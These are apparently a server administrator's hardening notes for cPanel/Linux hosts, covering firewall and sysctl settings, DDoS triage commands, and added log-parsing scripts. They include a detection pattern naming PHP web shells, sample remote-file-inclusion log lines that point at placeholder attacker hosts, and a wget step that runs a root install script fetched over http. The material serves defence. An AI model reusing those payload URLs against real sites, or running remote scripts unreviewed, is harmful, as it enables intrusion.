iptables -I INPUT -s (allowip) -p tcp --dport (port) -j ACCEPT
iptables -A INPUT -s 0.0.0.0/0 -p tcp --dport (port) -j DROP
The ACCEPT is inserted (-I) at the top so it matches before the catch-all DROP appended (-A) below it. The source for the DROP must be 0.0.0.0/0, meaning any address; 0.0.0.0/24 would only cover 0.0.0.0-0.0.0.255 and leave the port open to everyone else.
In csf:
vi /etc/csf/csf.conf
SYNFLOOD
SYNFLOOD is disabled by default. If you are not under attack there is no need to enable it; if you are expecting one, enable it and keep the limits fairly strict, for example:
SYNFLOOD = "1"
SYNFLOOD_RATE = "30/s"
SYNFLOOD_BURST = "10"
i.e. SYN packets arriving faster than 30 per second, after a burst allowance of 10, are dropped instead of queued (csf builds this from the iptables limit match). Do not leave it this strict when no attack is in progress: the limit does not distinguish attackers from a busy legitimate client, so it will refuse real connections.
PORTFLOOD
PORTFLOOD = "80;tcp;100;5,22;tcp;5;300"
Each comma-separated entry is port;protocol;hits;interval: if one IP opens more than 100 connections to tcp/80 within 5 seconds, or more than 5 to tcp/22 within 300 seconds, further connections from that IP to that port are dropped. Keep the ssh entry in mind when you script against the server, or you will lock yourself out.
In /etc/sysctl.conf
Paste the following into the file; it can replace the existing contents. The eth0 entries are per interface, so substitute your interface name if it is called something else.
#Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.
# Disables packet forwarding
net.ipv4.ip_forward=0
# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Log spoofed, source-routed and redirected packets (the "all" switch is set further down)
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.lo.log_martians = 1
net.ipv4.conf.eth0.log_martians = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
# Decrease the time default value for tcp_fin_timeout connection
net.ipv4.tcp_fin_timeout = 15
# Decrease the time default value for tcp_keepalive_time connection
net.ipv4.tcp_keepalive_time = 1800
# Keep window scaling and SACK on: turning them off costs throughput on fast or
# lossy links and does nothing against floods
net.ipv4.tcp_window_scaling = 1
net.ipv4.tcp_sack = 1
# Turn off TCP timestamps (hides uptime from remote fingerprinting; note this also
# disables PAWS and timestamp-based RTT measurement)
net.ipv4.tcp_timestamps = 0
# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1
# Enable ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Enable bad error message Protection
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 1
# Size of the SYN backlog (half-open connections waiting for the final ACK)
net.ipv4.tcp_max_syn_backlog = 1024
# Increase the tcp-time-wait buckets pool size
net.ipv4.tcp_max_tw_buckets = 1440000
# Allowed local (ephemeral) port range; the upper bound cannot exceed 65535
net.ipv4.ip_local_port_range = 16384 65535
Run /sbin/sysctl -p to load the file and sysctl -w net.ipv4.route.flush=1 to flush the routing cache, so the changes take effect without a reboot.
TCP Syncookies
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
Some IPTABLES rules. A limit match with -j RETURN on its own does nothing in the INPUT chain; it has to be paired with a DROP for the SYNs that exceed the limit. 1/s with a burst of 3 is far too low for a production web server, so raise the rate to match your real traffic:
iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A INPUT -p tcp --syn -j DROP
To disable ping
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
To enable ping
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
1. Enable SYN cookies by running:
# echo 1 > /proc/sys/net/ipv4/tcp_syncookies
2. Increase the SYN backlog queue to 2048:
# sysctl -w net.ipv4.tcp_max_syn_backlog=2048
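Added example, not part of the original notes: after sysctl -p, confirm the values are actually live by reading /proc/sys instead of trusting the command's exit status (it reports a bad key but carries on, and the eth0 entries fail on a box whose interface has another name). The function takes "key = value" lines in sysctl.conf syntax on stdin; the key list is a constructed subset of the file above, and the optional root-directory argument is an assumption added so the check can be run against a copied tree.

```shell
#!/bin/sh
# Added example: verify that the hardening keys are live in the kernel.
# WANT_SYSCTL is a constructed subset of the sysctl.conf above.
WANT_SYSCTL='net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.ip_local_port_range = 16384 65535
net.ipv4.tcp_fin_timeout = 15'

# Strip leading/trailing whitespace from stdin.
trim() { sed 's/^[[:space:]]*//;s/[[:space:]]*$//'; }

# audit_sysctl [root]   (root defaults to /proc/sys; pass another directory
# to check a copied or constructed tree)
# Reads "key = value" lines on stdin, compares each with the live value and
# prints "key wanted got" for every mismatch ("got" is MISSING when the key
# does not exist). Returns 0 only when every key matches.
audit_sysctl() {
    root="${1:-/proc/sys}"
    rc=0
    while IFS='=' read -r key want; do
        key=$(printf '%s' "$key" | trim)
        want=$(printf '%s' "$want" | trim | tr -s '[:space:]' ' ')
        case "$key" in ''|\#*) continue ;; esac        # skip blanks and comments
        path="$root/$(printf '%s' "$key" | tr . /)"     # net.ipv4.x -> net/ipv4/x
        if [ ! -r "$path" ]; then
            echo "$key $want MISSING"; rc=1; continue
        fi
        # /proc/sys separates multi-value entries with tabs; normalise to one space
        got=$(tr -s '[:space:]' ' ' < "$path" | trim)
        if [ "$got" != "$want" ]; then
            echo "$key $want $got"; rc=1
        fi
    done
    return $rc
}

# Stand-alone use: audit the running kernel.
printf '%s\n' "$WANT_SYSCTL" | audit_sysctl || echo "some keys are not applied (listed above)"
```

Run it once right after sysctl -p and again after the next reboot; a key that is correct now but MISSING or wrong after a reboot means the file is not being loaded at boot.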
#!/bin/bash
# cPanel resets the directory permissions under /opt/suphp; put them back.
chmod 755 /opt/suphp
find /opt/suphp -type d -exec chmod 755 {} \;
# Ensure each account's permissions are sane and won't cause a 500 error under suPHP.
for user in $(ls /var/cpanel/users); do
    chown -R "${user}:${user}" "/home/${user}/public_html"
    chmod 755 "/home/${user}/public_html"
    find "/home/${user}/public_html" -name '*.php' -exec chmod 644 {} \;
    find "/home/${user}/public_html" -type d -exec chmod 755 {} \;
    # Comment out Joomla-installed php_value/php_flag overrides, which suPHP does not
    # accept in .htaccess. Anchored to the line start so re-running does not add more '#'.
    find "/home/${user}/public_html" -name '.htaccess' -exec sed -i -e 's/^[[:space:]]*php_value/#php_value/' {} \;
    find "/home/${user}/public_html" -name '.htaccess' -exec sed -i -e 's/^[[:space:]]*php_flag/#php_flag/' {} \;
done
# Delete old session files: suPHP now runs PHP as the account user, which has no permission to them.
rm -rf /tmp/sess_*
#!/bin/bash
# Look for common PHP web shells and mass mailers, by name or marker string, in every account's web root.
# Review the hits by hand: short tokens such as c99 and r57 also match legitimate files.
shellpattern='r0nin|m0rtix|upl0ad|r57|c99|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|vulnscan|spymeta|raslan58'
for user in $(ls /var/cpanel/users); do
    find "/home/$user/public_html" \( -name '*.php' -o -name '*.cgi' -o -name '*.inc' \) -exec \
        grep -E -il "$shellpattern" {} \;
done
iptables -I INPUT -m iprange --src-range 192.168.1.10-192.168.1.13 -j DROP
URL Injection: attempts to make the server fetch and include a remote file through a PHP/CGI vulnerability (remote file inclusion).
Sample log entries, vhost-prefixed combined format. After "Request:" the first field is the domain being attacked and the second is the IP address of the attacker; the quoted request line shows the injected URL passed in the custompluginfile[] parameter.
Request: <domain attacked> <IP of attacker> - - [timestamp] "<request line>" <status> <bytes> "<referer>" "<user agent>"
------------------------------------------------------------------------------------------------
Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" SesohkAx1jYAAFNIEg0 "-"
Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" Sesoh0Ax1jYAAFN@Eng "-"
------------------------------------------------------------------------------------------------
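Added example, not from the original page: the pattern in the two log lines above (a query parameter whose value is a full URL on another host) can be pulled out of an access log with awk. The five log lines in the script are constructed in the same vhost-prefixed format with documentation addresses; the fourth and fifth are there to show two false positives the script avoids (a URL in the Referer field, and a parameter that points back at the site itself).

```shell
#!/bin/sh
# Added example: pull remote-file-inclusion probes out of an access log.
# ACCESS_LOG_SAMPLE is CONSTRUCTED in the vhost-prefixed combined format of the
# sample above (vhost client - - [time] "request" status bytes "referer" "agent").
ACCESS_LOG_SAMPLE='xxxx.com 198.51.100.9 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0"
xxxx.com 198.51.100.9 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0"
xxxx.com 192.0.2.20 - - [19/Apr/2009:08:36:00 -0500] "GET /index.php?page=ftp%3A%2F%2Fevil.example/sh.txt HTTP/1.1" 200 812 "-" "curl/7.19"
xxxx.com 192.0.2.30 - - [19/Apr/2009:08:36:05 -0500] "GET /blog/?p=12 HTTP/1.1" 200 4410 "http://xxxx.com/" "Mozilla/5.0"
xxxx.com 192.0.2.31 - - [19/Apr/2009:08:36:09 -0500] "GET /redirect?url=http://xxxx.com/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# rfi_hits < access_log  ->  "client vhost injected_url", one line per suspicious request
# A request is suspicious when a parameter carries a full URL whose host is not
# the vhost being served. Only the quoted request field is inspected, so a URL
# in the Referer (line 4) is not a hit, and a parameter pointing back at the
# site itself (line 5, a redirect target) is skipped as a likely false positive.
rfi_hits() {
    awk '{
        vhost = tolower($1); client = $2
        if (split($0, q, "\"") < 2) next                  # no quoted request field
        req = tolower(q[2])
        gsub(/%3a/, ":", req); gsub(/%2f/, "/", req)      # undo percent-encoded "://"
        if (!match(req, /=(https?|ftp):\/\/[^ &?"]+/)) next
        url = substr(req, RSTART + 1, RLENGTH - 1)        # drop the leading "="
        host = url; sub(/^[a-z]+:\/\//, "", host); sub(/[\/:].*$/, "", host)
        if (host != vhost) print client, vhost, url
    }'
}

# rfi_sources < access_log  ->  "count client", busiest first. Check the IPs by
# hand, then feed them to csf -d or an iptables DROP.
rfi_sources() {
    rfi_hits | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$ACCESS_LOG_SAMPLE" | rfi_hits
printf '%s\n' "$ACCESS_LOG_SAMPLE" | rfi_sources
```

Run it as `rfi_hits < /usr/local/apache/domlogs/<domain>` on a cPanel box, or `cat` several domlogs into it. The host-matches-vhost test is a heuristic: it suppresses redirect and callback parameters that legitimately point at the site, but a probe that injects a URL on the same host (for example a previously uploaded file) would be missed, so treat a 500 on a request carrying any URL parameter as worth a look.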
1. Find which IP address on the server is targeted by the DDoS attack:
netstat -plan | grep ':80 ' | awk '{print $4}' | cut -d: -f1 | sort | uniq -c
2. Find which IPs the attack is coming from:
netstat -plan | grep ':80 ' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
3. Then look at the TTL values of the attacking IP addresses:
tcpdump -nn -vvv host xxxx | grep yyyy   (xxxx = attacking IP, yyyy = IP being attacked)
Usually only tcpdump -nn -vvv host yyyy is needed, since the attack comes from numerous IPs; look for one TTL value shared by the flood but not by normal clients.
4. Block all packets to the target that carry that TTL value:
iptables -A INPUT -p tcp -s 0.0.0.0/0 -d yyyy -m ttl --ttl-eq zzz -j DROP   (zzz = the TTL value)
This is a blunt filter: any legitimate client whose packets happen to arrive with the same TTL is dropped too, so remove the rule once the flood stops.
——————————————————————————————————————-
Install mod_security and mod_evasive.
——————————————————————————————————————-
Harden the sysctl parameters (kernel parameters, see the /etc/sysctl.conf section above) to mitigate the current attack.
Increasing the SYN backlog (tcp_max_syn_backlog) and shortening how long half-open connections are kept (fewer tcp_synack_retries) helps a little; SYN cookies do most of the work.
——————————————————————————————————————-
Also install an open-source script that mitigates (D)DoS attacks to a certain extent:
http://deflate.medialayer.com/
MediaLayer was in need of a script to automatically mitigate (D)DoS attacks. The necessity started when MediaLayer was the target of a rather large, consistent attack originating from multiple IP addresses. Each IP would have a large amount of connections to the server, as shown by:
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
It became a general practice for us to be blocking IPs with a large amount of connections, but we wanted to get this automated. Zaf created a script to mitigate this kind of attack. We kept improving it to meet our own needs and eventually posted it on Defender Hosting's Forum. (D)DoS-Deflate is now recognized as one of the best ways to block a (D)DoS attack at the software level.
wget http://www.inetbase.com/scripts/ddos/install.sh
chmod 0700 install.sh
./install.sh
To remove it:
wget http://www.inetbase.com/scripts/ddos/uninstall.ddos
chmod 0700 uninstall.ddos
./uninstall.ddos
Read install.sh before running it: it is fetched over plain http and runs as root, so at the very least compare it with the copy on the reference site below.
Reference : http://deflate.medialayer.com/
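Added example, not from the original notes or from DDoS-Deflate: steps 1 to 4 above and the connection count that DDoS-Deflate automates, as shell functions over constructed netstat -plan and tcpdump -nn -vvv output (documentation addresses; the 8080 entry is there because a plain grep :80 would miscount it). The whitelist and thresholds are assumptions for the demo. Nothing is passed to iptables: block_rules prints the rules so they can be reviewed before being piped to sh.

```shell
#!/bin/sh
# Added example: steps 1-4 above (and the DDoS-Deflate connection count) as a
# dry run. Nothing here calls iptables; the rules are printed for review.
# Both captures are CONSTRUCTED in the output formats of `netstat -plan` and
# `tcpdump -nn -vvv`.
NETSTAT_SAMPLE='tcp        0      0 203.0.113.10:80         198.51.100.7:51001      ESTABLISHED 1234/httpd
tcp        0      0 203.0.113.10:80         198.51.100.7:51002      SYN_RECV    -
tcp        0      0 203.0.113.10:80         198.51.100.7:51003      SYN_RECV    -
tcp        0      0 203.0.113.10:80         198.51.100.7:51004      SYN_RECV    -
tcp        0      0 203.0.113.10:80         192.0.2.55:40001        ESTABLISHED 1234/httpd
tcp        0      0 203.0.113.10:80         192.0.2.55:40002        ESTABLISHED 1234/httpd
tcp        0      0 203.0.113.10:443        192.0.2.200:40010       ESTABLISHED 1234/httpd
tcp        0      0 203.0.113.10:8080       192.0.2.201:40011       ESTABLISHED 2222/java'

TCPDUMP_SAMPLE='12:00:01.000001 IP (tos 0x0, ttl 51, id 1, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.7.51002 > 203.0.113.10.80: Flags [S], seq 1, win 512, length 0
12:00:01.000002 IP (tos 0x0, ttl 51, id 2, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.7.51003 > 203.0.113.10.80: Flags [S], seq 2, win 512, length 0
12:00:01.000003 IP (tos 0x0, ttl 51, id 3, offset 0, flags [none], proto TCP (6), length 40)
    198.51.100.8.51003 > 203.0.113.10.80: Flags [S], seq 3, win 512, length 0
12:00:01.000004 IP (tos 0x0, ttl 63, id 4, offset 0, flags [DF], proto TCP (6), length 60)
    192.0.2.55.40001 > 203.0.113.10.80: Flags [S], seq 4, win 29200, options [mss 1460], length 0'

# Step 1: which local address is being hit on the port, by connection count.
targets_by_conns() {                  # netstat -plan | targets_by_conns 80
    awk -v port="$1" '$1 ~ /^tcp/ && $4 ~ (":" port "$") {   # anchored: :80 does not match :8080
            split($4, a, ":"); n[a[1]]++ }
        END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Step 2: which remote addresses the connections come from.
sources_by_conns() {                  # netstat -plan | sources_by_conns 80
    awk -v port="$1" '$1 ~ /^tcp/ && $4 ~ (":" port "$") {
            split($5, a, ":"); n[a[1]]++ }
        END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Step 3: TTL seen per source. In tcpdump -vvv output the TTL is on the
# "IP (tos ..., ttl N, ...)" line and the addresses on the indented line after it.
ttl_by_source() {                     # tcpdump -nn -vvv host <victim> | ttl_by_source
    awk 'match($0, /ttl [0-9]+/) { ttl = substr($0, RSTART + 4, RLENGTH - 4); next }
         ttl != "" && $2 == ">" { src = $1; sub(/\.[0-9]+$/, "", src)   # drop the port
                                  n[ttl " " src]++; ttl = "" }
         END { for (k in n) print n[k], k }' | sort -rn
}

# Step 4, per-source variant: a DROP for every source above the threshold,
# skipping WHITELIST so you cannot lock out your own management addresses.
WHITELIST="${WHITELIST:-127.0.0.1 192.0.2.55}"   # assumed admin/monitor addresses
block_rules() {                       # netstat -plan | block_rules 80 100   (| sh to apply)
    sources_by_conns "$1" | awk -v max="$2" -v port="$1" -v wl=" $WHITELIST " \
        '$1 > max && index(wl, " " $2 " ") == 0 {
            printf "iptables -I INPUT -s %s -p tcp --dport %s -j DROP\n", $2, port }'
}

# Stand-alone run over the constructed captures.
echo "# targets on :80";   printf '%s\n' "$NETSTAT_SAMPLE" | targets_by_conns 80
echo "# sources on :80";   printf '%s\n' "$NETSTAT_SAMPLE" | sources_by_conns 80
echo "# count ttl source"; printf '%s\n' "$TCPDUMP_SAMPLE" | ttl_by_source
echo "# rules (dry run)";  printf '%s\n' "$NETSTAT_SAMPLE" | block_rules 80 3
```

On a live box replace the printf with the real command (`netstat -plan | sources_by_conns 80`). The TTL histogram is what step 3 is really after: in the sample the flood shares ttl 51 while the normal client arrives with 63, which is the value you would put in the --ttl-eq rule; when the flood's TTLs are spread across many values that rule is useless and per-source blocking is the better tool.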
To preset a server:
First login and go to the WHM > Server Configuration > Basic cPanel/WHM
Setup:
1) Check that the main ip is the server primary ip
2) Make sure that the primary and secondary ns are set to ns1 and ns2 (or
how they had been prior to a reload)
**************************************************************************
Next go to WHM > Server Configuration > Tweak Settings:
Leave all the settings alone…ADD the following:
1) Under Domains: “Prevent users from parking/adding on common
internet domains. (ie hotmail.com, aol.com)”
2) Under Mail: “Attempt to prevent pop3 connection floods”
3) “Default catch-all/default address behavior for new accounts.” Select
‘fail’
4) “Email users when they have reached 80% of their bandwidth”
5) “Include a list of Pop before SMTP senders in the X-PopBeforeSMTP header
when relaying mail. (exim 4.34-30+ required)”
6) “Silently Discard all FormMail-clone requests with a bcc: header in the
subject line”
7) “Track the origin of messages sent though the mail server by adding the
X-Sender headers (exim 4.34+ required)”
8) Under Software: "Loader to use for internal cPanel PHP" select
'sourceguardian'
9) Under Status: “The load average that will cause the server status to
appear red (leave blank for default):” >> 5
10) Under System: “Allow Sharing Nameserver Ips”
11) “Use jailshell as the default shell for all new accounts and modified
accounts”
Click save at the bottom
**************************************************************************
Next, WHM > Server Configuration > Update Config:
1) Select ‘Automatic (RELEASE Tree)’
2) Verify that the cPanel Package Update and Security Package Update are
also set to ‘Automatic’
**************************************************************************
Next WHM > Security > Shell Fork Bomb Protection:
1) Enable Protection
**************************************************************************
Next, go to WHM > Security > Tweak Security please enable:
1) Php open_basedir Tweak
2) Compilers Tweak
3) SMTP Tweak
**************************************************************************
Next, WHM > Service Configuration:
1) Exim Configuration editor – enable Verify the existence of email senders
2) FTP configuration – Make sure Anonymous FTP is disabled
3) Nameserver Setup – Be sure that the nameserver is running
4) Service Manager – Check to monitor all EXCEPT the following:
Entropychat, Interchange, Melange, Tomcat and Exim on Another Port
**************************************************************************
Next, WHM > Cluster/Remote Access > Setup Remote Access Key:
1) Connect to SSH (if not already) and run the script:
pico /usr/local/cpanel/Cpanel/rvwhmkey
2) Copy/paste the key into the space provided, click ctrl x to exit, y to
save and hit enter to return to the prompt.
(NOTE: if there is no pico, an alternate method can be used: vi
/usr/local/cpanel/Cpanel/rvwhmkey; then press ‘i’ to insert text; paste
text; hit ‘esc’ to stop inserting text; press ‘:wq’ to save and exit- if you
need to exit without saving- ‘:q!’ will bring you back to prompt)
**************************************************************************
Next, back to WHM > Account Functions > Create a New Account:
1) Create an account with domain 'rvadmin.com', username 'rvadmin' and
password of <same as root> (note that reusing the root password here means a
compromise of this cPanel/FTP/mail login is a root compromise; a separate
strong password is the safer choice)
**************************************************************************
Next, WHM > System Health > Background Process Killer:
1) Click all open boxes and save.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Modules:
1) Click on cPanel Pro, Clamavconnector, Modbandwidth, Modsecurity and
Addonupdates and click ‘save’ to install.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Scripts:
1) Click all and click ‘save’ to install.
**************************************************************************
Next, WHM > Add-ons:
mod_security